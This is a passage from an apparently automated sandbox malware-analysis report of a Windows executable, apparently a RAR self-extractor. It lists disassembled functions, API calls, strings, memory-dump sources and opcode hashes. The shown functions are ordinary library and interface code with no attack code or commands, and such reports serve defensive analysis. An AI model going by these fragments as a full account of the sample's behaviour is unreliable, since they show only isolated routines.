                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$RectText
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3937224194-1658105358
                                                                                              • Opcode ID: a1db653dfbcd76ba175ed3a1542b69d4740148071788eb547d4d8d67c3125119
                                                                                              • Instruction ID: 9bda25b4e372d87b2b6d8e70212f8dff1fd9ec5f021f65ab874ed9289617a8ae
                                                                                              • Opcode Fuzzy Hash: a1db653dfbcd76ba175ed3a1542b69d4740148071788eb547d4d8d67c3125119
                                                                                              • Instruction Fuzzy Hash: 5F31C132104300EFCB259F64DC88B6B7BA8EF49702F054559FE899A1A7DBB4D984CF61
                                                                                              Function 0011BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0011BF79: _free.LIBCMT ref: 0011BFA2
                                                                                              • _free.LIBCMT ref: 0011C003
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 0011C00E
                                                                                              • _free.LIBCMT ref: 0011C019
                                                                                              • _free.LIBCMT ref: 0011C06D
                                                                                              • _free.LIBCMT ref: 0011C078
                                                                                              • _free.LIBCMT ref: 0011C083
                                                                                              • _free.LIBCMT ref: 0011C08E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                                                              • Instruction ID: 71ea666d8507f4cead3b5c396271b0ca96d037a6d9ce54773124971b7c5f7a42
                                                                                              • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                                                              • Instruction Fuzzy Hash: 0B117F31584B09FAD634BBB0CC47FCBB79D6F20700F40C834B299A6852DF64F9858A90
                                                                                              Function 001120CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,001120C1,0010FB12), ref: 001120D8
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001120E6
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001120FF
                                                                                              • SetLastError.KERNEL32(00000000,?,001120C1,0010FB12), ref: 00112151
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 740f8a3b85c0a49057adf624abeb920775237ae90eb24d7ca034275f481c3d82
                                                                                              • Instruction ID: 86a422ddb6645f4a18a13f7f2ab1eb9ecd509aaf88924e1008a0fc77420f251f
                                                                                              • Opcode Fuzzy Hash: 740f8a3b85c0a49057adf624abeb920775237ae90eb24d7ca034275f481c3d82
                                                                                              • Instruction Fuzzy Hash: 8D01D4362193117EA67CABB57C855EA7A88FB21770B210739F230554E0EF214CE69158
                                                                                              Function 0010DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 0-1718035505
                                                                                              • Opcode ID: 6a7385e155a391f7b2021d8dc6eb37e897ea77eb53b16ccd5835af5bf277d7b8
                                                                                              • Instruction ID: 4637934e69a6b86389000b9539369b246a6e08d7f4bb91bf3a2ae45f13e46156
                                                                                              • Opcode Fuzzy Hash: 6a7385e155a391f7b2021d8dc6eb37e897ea77eb53b16ccd5835af5bf277d7b8
                                                                                              • Instruction Fuzzy Hash: 5901F932641362ABDF316EF47D856A657949B46353320127EF581D72C0EBE1C8C1D7A0
                                                                                              Function 00100CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00100D0D
                                                                                                • Part of subcall function 000FACF5: GetVersionExW.KERNEL32(?), ref: 000FAD1A
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,00100CB8), ref: 00100D31
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00100D47
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00100D56
                                                                                              • SystemTimeToFileTime.KERNEL32(?,00100CB8), ref: 00100D64
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00100D72
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: b47497ec13b860853571f46ceaca7ceed91ebffa6332e621aa6185cedaa250d7
                                                                                              • Instruction ID: 4a9a562a3f50b734cf029d2e102586883d2ff7cae2bc678eaf57fef4c2171192
                                                                                              • Opcode Fuzzy Hash: b47497ec13b860853571f46ceaca7ceed91ebffa6332e621aa6185cedaa250d7
                                                                                              • Instruction Fuzzy Hash: 4131F77A900209ABCB10DFE4C8859EEBBB8FF58300B04441AE955E3610E7349695CB68
                                                                                              Function 001091B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: ade6d281bee31979f328668844c3bb00cf9c095b2e73c2627a9aca66ea613e60
                                                                                              • Instruction ID: a9c40054832483147b96b7875524a9521ece56951446faee9e9a65072157e8e0
                                                                                              • Opcode Fuzzy Hash: ade6d281bee31979f328668844c3bb00cf9c095b2e73c2627a9aca66ea613e60
                                                                                              • Instruction Fuzzy Hash: A221A47160010EBBD7199E10DC92E3B77ADEB60784B118128FC899B283E7B4ED569790
                                                                                              Function 00118FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00130EE8,00113E14,00130EE8,?,?,00113713,00000050,?,00130EE8,00000200), ref: 00118FA9
                                                                                              • _free.LIBCMT ref: 00118FDC
                                                                                              • _free.LIBCMT ref: 00119004
                                                                                              • SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 00119011
                                                                                              • SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 0011901D
                                                                                              • _abort.LIBCMT ref: 00119023
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 2a78d196c587eb3650f8b20b44282392a3058e0847ca948b180f0bd7ab6c3d1b
                                                                                              • Instruction ID: 7ec5a250f4e38b541abfa3eff4b476a41d6cebf39e2af1ef8fdc0751f9c8cf7e
                                                                                              • Opcode Fuzzy Hash: 2a78d196c587eb3650f8b20b44282392a3058e0847ca948b180f0bd7ab6c3d1b
                                                                                              • Instruction Fuzzy Hash: 11F02836605A017AC23E33246C0AFEF296B9FE0760F358134F424D2692EF20C9D35025
                                                                                              Function 0010D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0010D2F2
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0010D30C
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0010D31D
                                                                                              • TranslateMessage.USER32(?), ref: 0010D327
                                                                                              • DispatchMessageW.USER32(?), ref: 0010D331
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0010D33C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: 102b3fe824449cdf98c55aeaaa7344678457cb6fd0071dc483493a39073f2ec0
                                                                                              • Instruction ID: 52987fe81455c1b664b5e0de62a2a9073a7f51b67945f893e2634a4a42bf9ffd
                                                                                              • Opcode Fuzzy Hash: 102b3fe824449cdf98c55aeaaa7344678457cb6fd0071dc483493a39073f2ec0
                                                                                              • Instruction Fuzzy Hash: 30F03172A02219BBCB205BA1EC4CDDFBF6DEF56362F008011F646D6090D7749591C7B1
                                                                                              Function 0010C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0010C435
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CompareString_wcschr
                                                                                              • String ID: <$HIDE$MAX$MIN
                                                                                              • API String ID: 2548945186-3358265660
                                                                                              • Opcode ID: 0af419a9a7a3c3344b59829626808297a518310d99eb3154fb7e8fe5f147c818
                                                                                              • Instruction ID: 608b28ea60e7b8dc37619491a50993dbe4dd58b802d3bccba728a8848ecbd063
                                                                                              • Opcode Fuzzy Hash: 0af419a9a7a3c3344b59829626808297a518310d99eb3154fb7e8fe5f147c818
                                                                                              • Instruction Fuzzy Hash: 50318176A0020DAADB25DB94CC81EEA77BDEB64314F004166FA85D60D0EBF59EC48E90
                                                                                              Function 0010ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 0010ADFD
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0010AE22
                                                                                              • DeleteObject.GDI32(00000000), ref: 0010AE54
                                                                                              • DeleteObject.GDI32(00000000), ref: 0010AE77
                                                                                                • Part of subcall function 00109E1C: FindResourceW.KERNEL32(0010AE4D,PNG,?,?,?,0010AE4D,00000066), ref: 00109E2E
                                                                                                • Part of subcall function 00109E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0010AE4D,00000066), ref: 00109E46
                                                                                                • Part of subcall function 00109E1C: LoadResource.KERNEL32(00000000,?,?,?,0010AE4D,00000066), ref: 00109E59
                                                                                                • Part of subcall function 00109E1C: LockResource.KERNEL32(00000000,?,?,?,0010AE4D,00000066), ref: 00109E64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                              • String ID: ]
                                                                                              • API String ID: 142272564-3352871620
                                                                                              • Opcode ID: 1c1db1310d6b597150a6dd60d9bd41d6220e5a558b97d6d539ea4e52f6813162
                                                                                              • Instruction ID: 847b65fe426babca646dc1f9c9d30859fd636cb03c70054d53ee9a63146d39f9
                                                                                              • Opcode Fuzzy Hash: 1c1db1310d6b597150a6dd60d9bd41d6220e5a558b97d6d539ea4e52f6813162
                                                                                              • Instruction Fuzzy Hash: C4012633581315A7C7106764DC15ABF7B79AF82B52F180010FD80AB2D2DBB18C1582B1
                                                                                              Function 0010CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010CCDB
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0010CCF1
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0010CD05
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0010CD14
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              • Opcode ID: 2667cef5ec7654e235534245cd0ac40b08a48d78624672557a313dce8f579bab
                                                                                              • Instruction ID: 9b3f337fba90a99a9cd25f86a03fe5ec4e79f8b6c19f807a24ba7131112a50a3
                                                                                              • Opcode Fuzzy Hash: 2667cef5ec7654e235534245cd0ac40b08a48d78624672557a313dce8f579bab
                                                                                              • Instruction Fuzzy Hash: 1D01F133285310BBE2215F649E48FAB3BACAB9B702F100610F386A64E0C7F159449FE5
                                                                                              Function 001175C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00117573,00000000,?,00117513,00000000,0012BAD8,0000000C,0011766A,00000000,00000002), ref: 001175E2
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001175F5
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00117573,00000000,?,00117513,00000000,0012BAD8,0000000C,0011766A,00000000,00000002), ref: 00117618
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 93147f8564563a485c19c67861f1812aea938a8b069a2f5920e1eb7faa8c177e
                                                                                              • Instruction ID: 8195d95ef539e8ccb291f39fd0eee00556fc8527cbe11d9361666f5eb2ca0f97
                                                                                              • Opcode Fuzzy Hash: 93147f8564563a485c19c67861f1812aea938a8b069a2f5920e1eb7faa8c177e
                                                                                              • Instruction Fuzzy Hash: C6F04F30A08618BFDB259BA4DD09BDDBFB9EF04711F004068F805A2290DF748AA1CA94
                                                                                              Function 000FEB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00100085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001000A0
                                                                                                • Part of subcall function 00100085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000FEB86,Crypt32.dll,00000000,000FEC0A,?,?,000FEBEC,?,?,?), ref: 001000C2
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000FEB92
                                                                                              • GetProcAddress.KERNEL32(001381C0,CryptUnprotectMemory), ref: 000FEBA2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              • Opcode ID: 28fbf085ea5c54b0cb5b49eba4b5665bb4fd9f4c21b27afb201bb1d9bb2e48c5
                                                                                              • Instruction ID: f9fde1c52e759e4dc41e9dfce7150545264c98ace2a5c1dc6b2534ffa7296e45
                                                                                              • Opcode Fuzzy Hash: 28fbf085ea5c54b0cb5b49eba4b5665bb4fd9f4c21b27afb201bb1d9bb2e48c5
                                                                                              • Instruction Fuzzy Hash: 5FE04F70501751AECF319F34E808B52BAE45B19B05F00882DF4E6D3990D7FCD5D08B60
                                                                                              Function 00117DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 016e819cb8cc95b94f5885cd4678128202239e4ec3f93248b1240e061af52b8b
                                                                                              • Instruction ID: 496708699b1674b32c815a601d57d102fbc5b6bc609708a7367181912293bc4d
                                                                                              • Opcode Fuzzy Hash: 016e819cb8cc95b94f5885cd4678128202239e4ec3f93248b1240e061af52b8b
                                                                                              • Instruction Fuzzy Hash: 7B41C136A053049FCB28DF78C881A9EB7F5EF95714F1585A8E515EB381EB31AD42CB80
                                                                                              Function 0011B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0011B619
